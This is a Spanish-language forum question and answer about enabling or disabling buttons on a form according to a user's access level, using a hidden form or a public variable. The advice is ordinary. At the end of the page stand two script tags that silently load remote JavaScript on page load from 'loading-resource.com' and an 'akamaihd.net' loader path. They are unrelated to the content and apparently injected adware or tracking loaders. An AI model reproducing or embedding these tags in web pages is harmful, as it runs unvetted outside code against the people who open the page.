Validar un usuario y desactivar botones dependiendo el usuario

Tengo un formulario donde pide usuario y contraseña y no da acceso a los demás formularios, lo que quiero es que dependiendo del nivel de usuario el formulario que se abra tenga botones activados o desactivados
Mi tabla de usuarios tiene los campos; usuario, password, nivel (son 3 niveles)

1 respuesta

Respuesta

Supongo que el problema radica en traer los datos de la tabla donde tienes al usuario y el nivel. Sin entrar en como obtienes estos datos y los validas, eso parece que te funciona, te comento:

Yo la que uso es abrir un formulario oculto con los datos de usuario y su perfil. Este formulario se mantiene abierto durante la ejecución de la aplicación, por lo que es fácil "llamarle" desde cualquier lado y actuar en consecuencia (con un "if" o con un "select case", ir activando o desactivando los botones adecuados).

Se puede hacer de otra manera con un Dbusq, por ejemplo, pero tendrías que saber el usuario para obtener su nivel, y creo que no es tu caso.

Un saludo y no olvides visitar EL FORO

Me estaba poniendo a realizar un ejemplo que colgare en EL FORO y te comento otra manera de hacerlo, que es declarando una variable pública que recoja el nivel del usuario. Yo utilizo lo del formulario oculto ya que utilizo muchos más campos que el del nivel. Y además el formulario se abre al entrar en la aplicación y si alguien hubiese entrado sin identificarse, es decir, que este formulario no estaría abierto, cierro la aplicación. (Aunque esto último también podría hacerse con la variable pública).

Un saludo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>